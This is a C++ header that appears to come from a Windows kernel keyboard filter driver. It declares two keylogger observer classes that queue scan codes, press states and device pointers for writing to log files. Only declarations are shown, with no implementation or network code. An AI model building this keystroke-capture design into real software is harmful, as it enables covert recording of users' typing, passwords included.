#ifndef __C_KEY_LOGGER_OBSERVER_H__
#define __C_KEY_LOGGER_OBSERVER_H__

#include "IExternalObserver.h"
#include "Guards.h"

#include <string>
#include <list>
#include <map>

class CKeyLoggerObserver :
	public IKBExternalObserver
{
	public:
		CKeyLoggerObserver(void);
		~CKeyLoggerObserver(void);
	private:
		typedef struct _KEY_LOG_DATA{
			unsigned short usScanCode;
			bool bPressed;
		} _KEY_LOG_DATA, KEY_LOG_DATA;

		CNativeHandleGuard m_logFileHandle;
		CNativeEventWrapper m_kbEvent;
		CLockableListWrapper<KEY_LOG_DATA> m_queuedList;
		bool m_bGenericLogCreated;

		void OnProcessEvent(KEY_STATE_DATA& data);

		friend static void WorkLoggerThread(PVOID pContext);
};

class CKeyLoggerObserver2 :
	public IKBExternalObserverEx
{
public:
	CKeyLoggerObserver2(void);
	~CKeyLoggerObserver2(void);
private:
	typedef struct _KEY_LOG_DATA{
		unsigned short usScanCode;
		bool bPressed;
		PDEVICE_OBJECT pTopPortDevice;
	} _KEY_LOG_DATA, KEY_LOG_DATA;

	typedef std::map<PDEVICE_OBJECT, HANDLE> DeviceLoggersMap;
	typedef std::pair<PDEVICE_OBJECT, HANDLE> DeviceLoggersPair;

	CNativeEventWrapper m_kbEvent;
	CLockableListWrapper<KEY_LOG_DATA> m_queuedList;
	DeviceLoggersMap m_deviceLoggersMap;
	CSpinLockWrapper m_locker;

	void OnProcessEvent(PDEVICE_OBJECT pTopPortDevice, KEY_STATE_DATA& data);

	friend static void WorkLoggerThread2(PVOID pContext);
};

#endif